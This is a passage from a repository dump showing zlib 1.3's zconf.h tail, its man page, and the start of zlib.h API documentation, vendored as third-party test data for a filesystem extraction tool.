*/ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if 
defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. 
*/ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.3 ================================================ .TH ZLIB 3 "18 Aug 2023" .SH NAME zlib \- compression/decompression library .SH SYNOPSIS [see .I zlib.h for full description] .SH DESCRIPTION The .I zlib library is a general purpose data compression library. The code is thread safe, assuming that the standard library functions used are thread safe, such as memory allocation routines. It provides in-memory compression and decompression functions, including integrity checks of the uncompressed data. This version of the library supports only one compression method (deflation) but other algorithms may be added later with the same stream interface. .LP Compression can be done in a single step if the buffers are large enough or can be done by repeated calls of the compression function. In the latter case, the application must provide more input and/or consume the output (providing more output space) before each call. 
.LP The library also supports reading and writing files in .IR gzip (1) (.gz) format with an interface similar to that of stdio. .LP The library does not install any signal handler. The decoder checks the consistency of the compressed data, so the library should never crash even in the case of corrupted input. .LP All functions of the compression library are documented in the file .IR zlib.h . The distribution source includes examples of use of the library in the files .I test/example.c and .IR test/minigzip.c, as well as other examples in the .IR examples/ directory. .LP Changes to this version are documented in the file .I ChangeLog that accompanies the source. .LP .I zlib is built in to many languages and operating systems, including but not limited to Java, Python, .NET, PHP, Perl, Ruby, Swift, and Go. .LP An experimental package to read and write files in the .zip format, written on top of .I zlib by Gilles Vollant (info@winimage.com), is available at: .IP http://www.winimage.com/zLibDll/minizip.html and also in the .I contrib/minizip directory of the main .I zlib source distribution. .SH "SEE ALSO" The .I zlib web site can be found at: .IP http://zlib.net/ .LP The data format used by the .I zlib library is described by RFC (Request for Comments) 1950 to 1952 in the files: .IP http://tools.ietf.org/html/rfc1950 (for the zlib header and trailer format) .br http://tools.ietf.org/html/rfc1951 (for the deflate compressed data format) .br http://tools.ietf.org/html/rfc1952 (for the gzip header and trailer format) .LP Mark Nelson wrote an article about .I zlib for the Jan. 1997 issue of Dr. Dobb's Journal; a copy of the article is available at: .IP http://marknelson.us/1997/01/01/zlib-engine/ .SH "REPORTING PROBLEMS" Before reporting a problem, please check the .I zlib web site to verify that you have the latest version of .IR zlib ; otherwise, obtain the latest version and see if the problem still exists. 
Please read the .I zlib FAQ at: .IP http://zlib.net/zlib_faq.html .LP before asking for help. Send questions and/or comments to zlib@gzip.org, or (for the Windows DLL version) to Gilles Vollant (info@winimage.com). .SH AUTHORS AND LICENSE Version 1.3 .LP Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler .LP This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. .LP Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: .LP .nr step 1 1 .IP \n[step]. 3 The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. .IP \n+[step]. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. .IP \n+[step]. This notice may not be removed or altered from any source distribution. .LP Jean-loup Gailly Mark Adler .br jloup@gzip.org madler@alumni.caltech.edu .LP The deflate format used by .I zlib was defined by Phil Katz. The deflate and .I zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in .IR zlib ; who are too numerous to cite here. .LP UNIX manual page by R. P. C. Rodgers, U.S. National Library of Medicine (rodgers@nlm.nih.gov). 
.\" end of man page ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.h ================================================ /* zlib.h -- interface of the 'zlib' general purpose compression library version 1.3, August 18th, 2023 Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950 (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format). */ #ifndef ZLIB_H #define ZLIB_H #include "zconf.h" #ifdef __cplusplus extern "C" { #endif #define ZLIB_VERSION "1.3" #define ZLIB_VERNUM 0x1300 #define ZLIB_VER_MAJOR 1 #define ZLIB_VER_MINOR 3 #define ZLIB_VER_REVISION 0 #define ZLIB_VER_SUBREVISION 0 /* The 'zlib' compression library provides in-memory compression and decompression functions, including integrity checks of the uncompressed data. 
This version of the library supports only one compression method (deflation) but other algorithms will be added later and will have the same stream interface. Compression can be done in a single step if the buffers are large enough, or can be done by repeated calls of the compression function. In the latter case, the application must provide more input and/or consume the output (providing more output space) before each call. The compressed data format used by default by the in-memory functions is the zlib format, which is a zlib wrapper documented in RFC 1950, wrapped around a deflate stream, which is itself documented in RFC 1951. The library also supports reading and writing files in gzip (.gz) format with an interface similar to that of stdio using the functions that start with "gz". The gzip format is different from the zlib format. gzip is a gzip wrapper, documented in RFC 1952, wrapped around a deflate stream. This library can optionally read and write gzip and raw deflate streams in memory as well. The zlib format was designed to be compact and fast for use in memory and on communications channels. The gzip format was designed for single-file compression on file systems, has a larger header than zlib to maintain directory information, and uses a different, slower check method than zlib. The library does not install any signal handler. The decoder checks the consistency of the compressed data, so the library should never crash even in the case of corrupted input.
*/ typedef voidpf (*alloc_func)(voidpf opaque, uInt items, uInt size); typedef void (*free_func)(voidpf opaque, voidpf address); struct internal_state; typedef struct z_stream_s { z_const Bytef *next_in; /* next input byte */ uInt avail_in; /* number of bytes available at next_in */ uLong total_in; /* total number of input bytes read so far */ Bytef *next_out; /* next output byte will go here */ uInt avail_out; /* remaining free space at next_out */ uLong total_out; /* total number of bytes output so far */ z_const char *msg; /* last error message, NULL if no error */ struct internal_state FAR *state; /* not visible by applications */ alloc_func zalloc; /* used to allocate the internal state */ free_func zfree; /* used to free the internal state */ voidpf opaque; /* private data object passed to zalloc and zfree */ int data_type; /* best guess about the data type: binary or text for deflate, or the decoding state for inflate */ uLong adler; /* Adler-32 or CRC-32 value of the uncompressed data */ uLong reserved; /* reserved for future use */ } z_stream; typedef z_stream FAR *z_streamp; /* gzip header information passed to and from zlib routines. See RFC 1952 for more details on the meanings of these fields. 
*/ typedef struct gz_header_s { int text; /* true if compressed data believed to be text */ uLong time; /* modification time */ int xflags; /* extra flags (not used when writing a gzip file) */ int os; /* operating system */ Bytef *extra; /* pointer to extra field or Z_NULL if none */ uInt extra_len; /* extra field length (valid if extra != Z_NULL) */ uInt extra_max; /* space at extra (only when reading header) */ Bytef *name; /* pointer to zero-terminated file name or Z_NULL */ uInt name_max; /* space at name (only when reading header) */ Bytef *comment; /* pointer to zero-terminated comment or Z_NULL */ uInt comm_max; /* space at comment (only when reading header) */ int hcrc; /* true if there was or will be a header crc */ int done; /* true when done reading gzip header (not used when writing a gzip file) */ } gz_header; typedef gz_header FAR *gz_headerp; /* The application must update next_in and avail_in when avail_in has dropped to zero. It must update next_out and avail_out when avail_out has dropped to zero. The application must initialize zalloc, zfree and opaque before calling the init function. All other fields are set by the compression library and must not be updated by the application. The opaque value provided by the application will be passed as the first parameter for calls of zalloc and zfree. This can be useful for custom memory management. The compression library attaches no meaning to the opaque value. zalloc must return Z_NULL if there is not enough memory for the object. If zlib is used in a multi-threaded application, zalloc and zfree must be thread safe. In that case, zlib is thread-safe. When zalloc and zfree are Z_NULL on entry to the initialization function, they are set to internal routines that use the standard library functions malloc() and free(). 
On 16-bit systems, the functions zalloc and zfree must be able to allocate exactly 65536 bytes, but will not be required to allocate more than this if the symbol MAXSEG_64K is defined (see zconf.h). WARNING: On MSDOS, pointers returned by zalloc for objects of exactly 65536 bytes *must* have their offset normalized to zero. The default allocation function provided by this library ensures this (see zutil.c). To reduce memory requirements and avoid any allocation of 64K objects, at the expense of compression ratio, compile the library with -DMAX_WBITS=14 (see zconf.h). The fields total_in and total_out can be used for statistics or progress reports. After compression, total_in holds the total size of the uncompressed data and may be saved for use by the decompressor (particularly if the decompressor wants to decompress everything in a single step). */ /* constants */ #define Z_NO_FLUSH 0 #define Z_PARTIAL_FLUSH 1 #define Z_SYNC_FLUSH 2 #define Z_FULL_FLUSH 3 #define Z_FINISH 4 #define Z_BLOCK 5 #define Z_TREES 6 /* Allowed flush values; see deflate() and inflate() below for details */ #define Z_OK 0 #define Z_STREAM_END 1 #define Z_NEED_DICT 2 #define Z_ERRNO (-1) #define Z_STREAM_ERROR (-2) #define Z_DATA_ERROR (-3) #define Z_MEM_ERROR (-4) #define Z_BUF_ERROR (-5) #define Z_VERSION_ERROR (-6) /* Return codes for the compression/decompression functions. Negative values * are errors, positive values are used for special but normal events. 
*/ #define Z_NO_COMPRESSION 0 #define Z_BEST_SPEED 1 #define Z_BEST_COMPRESSION 9 #define Z_DEFAULT_COMPRESSION (-1) /* compression levels */ #define Z_FILTERED 1 #define Z_HUFFMAN_ONLY 2 #define Z_RLE 3 #define Z_FIXED 4 #define Z_DEFAULT_STRATEGY 0 /* compression strategy; see deflateInit2() below for details */ #define Z_BINARY 0 #define Z_TEXT 1 #define Z_ASCII Z_TEXT /* for compatibility with 1.2.2 and earlier */ #define Z_UNKNOWN 2 /* Possible values of the data_type field for deflate() */ #define Z_DEFLATED 8 /* The deflate compression method (the only one supported in this version) */ #define Z_NULL 0 /* for initializing zalloc, zfree, opaque */ #define zlib_version zlibVersion() /* for compatibility with versions < 1.0.2 */ /* basic functions */ ZEXTERN const char * ZEXPORT zlibVersion(void); /* The application can compare zlibVersion and ZLIB_VERSION for consistency. If the first character differs, the library code actually used is not compatible with the zlib.h header file used by the application. This check is automatically made by deflateInit and inflateInit. */ /* ZEXTERN int ZEXPORT deflateInit(z_streamp strm, int level); Initializes the internal stream state for compression. The fields zalloc, zfree and opaque must be initialized before by the caller. If zalloc and zfree are set to Z_NULL, deflateInit updates them to use default allocation functions. total_in, total_out, adler, and msg are initialized. The compression level must be Z_DEFAULT_COMPRESSION, or between 0 and 9: 1 gives best speed, 9 gives best compression, 0 gives no compression at all (the input data is simply copied a block at a time). Z_DEFAULT_COMPRESSION requests a default compromise between speed and compression (currently equivalent to level 6). 
deflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if level is not a valid compression level, or Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible with the version assumed by the caller (ZLIB_VERSION). msg is set to null if there is no error message. deflateInit does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflate(z_streamp strm, int flush); /* deflate compresses as much data as possible, and stops when the input buffer becomes empty or the output buffer becomes full. It may introduce some output latency (reading input without producing any output) except when forced to flush. The detailed semantics are as follows. deflate performs one or both of the following actions: - Compress more input starting at next_in and update next_in and avail_in accordingly. If not all input can be processed (because there is not enough room in the output buffer), next_in and avail_in are updated and processing will resume at this point for the next call of deflate(). - Generate more output starting at next_out and update next_out and avail_out accordingly. This action is forced if the parameter flush is non zero. Forcing flush frequently degrades the compression ratio, so this parameter should be set only when necessary. Some output may be provided even if flush is zero. Before the call of deflate(), the application should ensure that at least one of the actions is possible, by providing more input and/or consuming more output, and updating avail_in or avail_out accordingly; avail_out should never be zero before the call. The application can consume the compressed output when it wants, for example when the output buffer is full (avail_out == 0), or after each call of deflate(). If deflate returns Z_OK and with zero avail_out, it must be called again after making room in the output buffer because there might be more output pending. 
See deflatePending(), which can be used if desired to determine whether or not there is more output in that case. Normally the parameter flush is set to Z_NO_FLUSH, which allows deflate to decide how much data to accumulate before producing output, in order to maximize compression. If the parameter flush is set to Z_SYNC_FLUSH, all pending output is flushed to the output buffer and the output is aligned on a byte boundary, so that the decompressor can get all input data available so far. (In particular avail_in is zero after the call if enough output space has been provided before the call.) Flushing may degrade compression for some compression algorithms and so it should be used only when necessary. This completes the current deflate block and follows it with an empty stored block that is three bits plus filler bits to the next byte, followed by four bytes (00 00 ff ff). If flush is set to Z_PARTIAL_FLUSH, all pending output is flushed to the output buffer, but the output is not aligned to a byte boundary. All of the input data so far will be available to the decompressor, as for Z_SYNC_FLUSH. This completes the current deflate block and follows it with an empty fixed codes block that is 10 bits long. This assures that enough bytes are output in order for the decompressor to finish the block before the empty fixed codes block. If flush is set to Z_BLOCK, a deflate block is completed and emitted, as for Z_SYNC_FLUSH, but the output is not aligned on a byte boundary, and up to seven bits of the current block are held to be written as the next byte after the next deflate block is completed. In this case, the decompressor may not be provided enough bits at this point in order to complete decompression of the data provided so far to the compressor. It may need to wait for the next block to be emitted. This is for advanced applications that need to control the emission of deflate blocks. 
If flush is set to Z_FULL_FLUSH, all output is flushed as with Z_SYNC_FLUSH, and the compression state is reset so that decompression can restart from this point if previous compressed data has been damaged or if random access is desired. Using Z_FULL_FLUSH too often can seriously degrade compression. If deflate returns with avail_out == 0, this function must be called again with the same value of the flush parameter and more output space (updated avail_out), until the flush is complete (deflate returns with non-zero avail_out). In the case of a Z_FULL_FLUSH or Z_SYNC_FLUSH, make sure that avail_out is greater than six when the flush marker begins, in order to avoid repeated flush markers upon calling deflate() again when avail_out == 0. If the parameter flush is set to Z_FINISH, pending input is processed, pending output is flushed and deflate returns with Z_STREAM_END if there was enough output space. If deflate returns with Z_OK or Z_BUF_ERROR, this function must be called again with Z_FINISH and more output space (updated avail_out) but no more input data, until it returns with Z_STREAM_END or an error. After deflate has returned Z_STREAM_END, the only possible operations on the stream are deflateReset or deflateEnd. Z_FINISH can be used in the first deflate call after deflateInit if all the compression is to be done in a single step. In order to complete in one call, avail_out must be at least the value returned by deflateBound (see below). Then deflate is guaranteed to return Z_STREAM_END. If not enough output space is provided, deflate will not return Z_STREAM_END, and it must be called again as described above. deflate() sets strm->adler to the Adler-32 checksum of all input read so far (that is, total_in bytes). If a gzip stream is being generated, then strm->adler will be the CRC-32 checksum of the input read so far. (See deflateInit2 below.) deflate() may update strm->data_type if it can make a good guess about the input data type (Z_BINARY or Z_TEXT). 
If in doubt, the data is considered binary. This field is only for information purposes and does not affect the compression algorithm in any manner. deflate() returns Z_OK if some progress has been made (more input processed or more output produced), Z_STREAM_END if all input has been consumed and all output has been produced (only when flush is set to Z_FINISH), Z_STREAM_ERROR if the stream state was inconsistent (for example if next_in or next_out was Z_NULL or the state was inadvertently written over by the application), or Z_BUF_ERROR if no progress is possible (for example avail_in or avail_out was zero). Note that Z_BUF_ERROR is not fatal, and deflate() can be called again with more input and more output space to continue compressing. */ ZEXTERN int ZEXPORT deflateEnd(z_streamp strm); /* All dynamically allocated data structures for this stream are freed. This function discards any unprocessed input and does not flush any pending output. deflateEnd returns Z_OK if success, Z_STREAM_ERROR if the stream state was inconsistent, Z_DATA_ERROR if the stream was freed prematurely (some input or output was discarded). In the error case, msg may be set but then points to a static string (which must not be deallocated). */ /* ZEXTERN int ZEXPORT inflateInit(z_streamp strm); Initializes the internal stream state for decompression. The fields next_in, avail_in, zalloc, zfree and opaque must be initialized before by the caller. In the current version of inflate, the provided input is not read or consumed. The allocation of a sliding window will be deferred to the first call of inflate (if the decompression does not complete on the first call). If zalloc and zfree are set to Z_NULL, inflateInit updates them to use default allocation functions. total_in, total_out, adler, and msg are initialized. 
inflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_VERSION_ERROR if the zlib library version is incompatible with the version assumed by the caller, or Z_STREAM_ERROR if the parameters are invalid, such as a null pointer to the structure. msg is set to null if there is no error message. inflateInit does not perform any decompression. Actual decompression will be done by inflate(). So next_in, and avail_in, next_out, and avail_out are unused and unchanged. The current implementation of inflateInit() does not process any header information -- that is deferred until inflate() is called. */ ZEXTERN int ZEXPORT inflate(z_streamp strm, int flush); /* inflate decompresses as much data as possible, and stops when the input buffer becomes empty or the output buffer becomes full. It may introduce some output latency (reading input without producing any output) except when forced to flush. The detailed semantics are as follows. inflate performs one or both of the following actions: - Decompress more input starting at next_in and update next_in and avail_in accordingly. If not all input can be processed (because there is not enough room in the output buffer), then next_in and avail_in are updated accordingly, and processing will resume at this point for the next call of inflate(). - Generate more output starting at next_out and update next_out and avail_out accordingly. inflate() provides as much output as possible, until there is no more input data or no more space in the output buffer (see below about the flush parameter). Before the call of inflate(), the application should ensure that at least one of the actions is possible, by providing more input and/or consuming more output, and updating the next_* and avail_* values accordingly. If the caller of inflate() does not provide both available input and available output space, it is possible that there will be no progress made. 
The application can consume the uncompressed output when it wants, for example when the output buffer is full (avail_out == 0), or after each call of inflate(). If inflate returns Z_OK and with zero avail_out, it must be called again after making room in the output buffer because there might be more output pending. The flush parameter of inflate() can be Z_NO_FLUSH, Z_SYNC_FLUSH, Z_FINISH, Z_BLOCK, or Z_TREES. Z_SYNC_FLUSH requests that inflate() flush as much output as possible to the output buffer. Z_BLOCK requests that inflate() stop if and when it gets to the next deflate block boundary. When decoding the zlib or gzip format, this will cause inflate() to return immediately after the header and before the first block. When doing a raw inflate, inflate() will go ahead and process the first block, and will return when it gets to the end of that block, or when it runs out of data. The Z_BLOCK option assists in appending to or combining deflate streams. To assist in this, on return inflate() always sets strm->data_type to the number of unused bits in the last byte taken from strm->next_in, plus 64 if inflate() is currently decoding the last block in the deflate stream, plus 128 if inflate() returned immediately after decoding an end-of-block code or decoding the complete header up to just before the first byte of the deflate stream. The end-of-block will not be indicated until all of the uncompressed data from that block has been written to strm->next_out. The number of unused bits may in general be greater than seven, except when bit 7 of data_type is set, in which case the number of unused bits will be less than eight. data_type is set as noted here every time inflate() returns for all flush options, and so can be used to determine the amount of currently consumed input in bits. The Z_TREES option behaves as Z_BLOCK does, but it also returns when the end of each deflate block header is reached, before any actual data in that block is decoded. 
This allows the caller to determine the length of the deflate block header for later use in random access within a deflate block. 256 is added to the value of strm->data_type when inflate() returns immediately after reaching the end of the deflate block header. inflate() should normally be called until it returns Z_STREAM_END or an error. However if all decompression is to be performed in a single step (a single call of inflate), the parameter flush should be set to Z_FINISH. In this case all pending input is processed and all pending output is flushed; avail_out must be large enough to hold all of the uncompressed data for the operation to complete. (The size of the uncompressed data may have been saved by the compressor for this purpose.) The use of Z_FINISH is not required to perform an inflation in one step. However it may be used to inform inflate that a faster approach can be used for the single inflate() call. Z_FINISH also informs inflate to not maintain a sliding window if the stream completes, which reduces inflate's memory footprint. If the stream does not complete, either because not all of the stream is provided or not enough output space is provided, then a sliding window will be allocated and inflate() can be called again to continue the operation as if Z_NO_FLUSH had been used. In this implementation, inflate() always flushes as much output as possible to the output buffer, and always uses the faster approach on the first call. So the effects of the flush parameter in this implementation are on the return value of inflate() as noted below, when inflate() returns early when Z_BLOCK or Z_TREES is used, and when inflate() avoids the allocation of memory for a sliding window when Z_FINISH is used. 
If a preset dictionary is needed after this call (see inflateSetDictionary below), inflate sets strm->adler to the Adler-32 checksum of the dictionary chosen by the compressor and returns Z_NEED_DICT; otherwise it sets strm->adler to the Adler-32 checksum of all output produced so far (that is, total_out bytes) and returns Z_OK, Z_STREAM_END or an error code as described below. At the end of the stream, inflate() checks that its computed Adler-32 checksum is equal to that saved by the compressor and returns Z_STREAM_END only if the checksum is correct. inflate() can decompress and check either zlib-wrapped or gzip-wrapped deflate data. The header type is detected automatically, if requested when initializing with inflateInit2(). Any information contained in the gzip header is not retained unless inflateGetHeader() is used. When processing gzip-wrapped deflate data, strm->adler is set to the CRC-32 of the output produced so far. The CRC-32 is checked against the gzip trailer, as is the uncompressed length, modulo 2^32. inflate() returns Z_OK if some progress has been made (more input processed or more output produced), Z_STREAM_END if the end of the compressed data has been reached and all uncompressed output has been produced, Z_NEED_DICT if a preset dictionary is needed at this point, Z_DATA_ERROR if the input data was corrupted (input stream not conforming to the zlib format or incorrect check value, in which case strm->msg points to a string with a more specific error), Z_STREAM_ERROR if the stream structure was inconsistent (for example next_in or next_out was Z_NULL, or the state was inadvertently written over by the application), Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if no progress was possible or if there was not enough room in the output buffer when Z_FINISH is used. Note that Z_BUF_ERROR is not fatal, and inflate() can be called again with more input and more output space to continue decompressing.
If Z_DATA_ERROR is returned, the application may then call inflateSync() to look for a good compression block if a partial recovery of the data is to be attempted. */ ZEXTERN int ZEXPORT inflateEnd(z_streamp strm); /* All dynamically allocated data structures for this stream are freed. This function discards any unprocessed input and does not flush any pending output. inflateEnd returns Z_OK if success, or Z_STREAM_ERROR if the stream state was inconsistent. */ /* Advanced functions */ /* The following functions are needed only in some special applications. */ /* ZEXTERN int ZEXPORT deflateInit2(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy); This is another version of deflateInit with more compression options. The fields zalloc, zfree and opaque must be initialized before by the caller. The method parameter is the compression method. It must be Z_DEFLATED in this version of the library. The windowBits parameter is the base two logarithm of the window size (the size of the history buffer). It should be in the range 8..15 for this version of the library. Larger values of this parameter result in better compression at the expense of memory usage. The default value is 15 if deflateInit is used instead. For the current implementation of deflate(), a windowBits value of 8 (a window size of 256 bytes) is not supported. As a result, a request for 8 will result in 9 (a 512-byte window). In that case, providing 8 to inflateInit2() will result in an error when the zlib header with 9 is checked against the initialization of inflate(). The remedy is to not use 8 with deflateInit2() with this initialization, or at least in that case use 9 with inflateInit2(). windowBits can also be -8..-15 for raw deflate. In this case, -windowBits determines the window size. deflate() will then generate raw deflate data with no zlib header or trailer, and will not compute a check value. windowBits can also be greater than 15 for optional gzip encoding. 
Add 16 to windowBits to write a simple gzip header and trailer around the compressed data instead of a zlib wrapper. The gzip header will have no file name, no extra data, no comment, no modification time (set to zero), no header crc, and the operating system will be set to the appropriate value, if the operating system was determined at compile time. If a gzip stream is being written, strm->adler is a CRC-32 instead of an Adler-32. For raw deflate or gzip encoding, a request for a 256-byte window is rejected as invalid, since only the zlib header provides a means of transmitting the window size to the decompressor. The memLevel parameter specifies how much memory should be allocated for the internal compression state. memLevel=1 uses minimum memory but is slow and reduces compression ratio; memLevel=9 uses maximum memory for optimal speed. The default value is 8. See zconf.h for total memory usage as a function of windowBits and memLevel. The strategy parameter is used to tune the compression algorithm. Use the value Z_DEFAULT_STRATEGY for normal data, Z_FILTERED for data produced by a filter (or predictor), Z_HUFFMAN_ONLY to force Huffman encoding only (no string match), or Z_RLE to limit match distances to one (run-length encoding). Filtered data consists mostly of small values with a somewhat random distribution. In this case, the compression algorithm is tuned to compress them better. The effect of Z_FILTERED is to force more Huffman coding and less string matching; it is somewhat intermediate between Z_DEFAULT_STRATEGY and Z_HUFFMAN_ONLY. Z_RLE is designed to be almost as fast as Z_HUFFMAN_ONLY, but give better compression for PNG image data. The strategy parameter only affects the compression ratio but not the correctness of the compressed output even if it is not set appropriately. Z_FIXED prevents the use of dynamic Huffman codes, allowing for a simpler decoder for special applications. 
deflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if any parameter is invalid (such as an invalid method), or Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible with the version assumed by the caller (ZLIB_VERSION). msg is set to null if there is no error message. deflateInit2 does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength); /* Initializes the compression dictionary from the given byte sequence without producing any compressed output. When using the zlib format, this function must be called immediately after deflateInit, deflateInit2 or deflateReset, and before any call of deflate. When doing raw deflate, this function must be called either before any call of deflate, or immediately after the completion of a deflate block, i.e. after all input has been consumed and all output has been delivered when using any of the flush options Z_BLOCK, Z_PARTIAL_FLUSH, Z_SYNC_FLUSH, or Z_FULL_FLUSH. The compressor and decompressor must use exactly the same dictionary (see inflateSetDictionary). The dictionary should consist of strings (byte sequences) that are likely to be encountered later in the data to be compressed, with the most commonly used strings preferably put towards the end of the dictionary. Using a dictionary is most useful when the data to be compressed is short and can be predicted with good accuracy; the data can then be compressed better than with the default empty dictionary. Depending on the size of the compression data structures selected by deflateInit or deflateInit2, a part of the dictionary may in effect be discarded, for example if the dictionary is larger than the window size provided in deflateInit or deflateInit2. Thus the strings most likely to be useful should be put at the end of the dictionary, not at the front. 
In addition, the current implementation of deflate will use at most the window size minus 262 bytes of the provided dictionary. Upon return of this function, strm->adler is set to the Adler-32 value of the dictionary; the decompressor may later use this value to determine which dictionary has been used by the compressor. (The Adler-32 value applies to the whole dictionary even if only a subset of the dictionary is actually used by the compressor.) If a raw deflate was requested, then the Adler-32 value is not computed and strm->adler is not set. deflateSetDictionary returns Z_OK if success, or Z_STREAM_ERROR if a parameter is invalid (e.g. dictionary being Z_NULL) or the stream state is inconsistent (for example if deflate has already been called for this stream or if not at a block boundary for raw deflate). deflateSetDictionary does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength); /* Returns the sliding dictionary being maintained by deflate. dictLength is set to the number of bytes in the dictionary, and that many bytes are copied to dictionary. dictionary must have enough space, where 32768 bytes is always enough. If deflateGetDictionary() is called with dictionary equal to Z_NULL, then only the dictionary length is returned, and nothing is copied. Similarly, if dictLength is Z_NULL, then it is not set. deflateGetDictionary() may return a length less than the window size, even when more than the window size in input has been provided. It may return up to 258 bytes less in that case, due to how zlib's implementation of deflate manages the sliding window and lookahead for matches, where matches can be up to 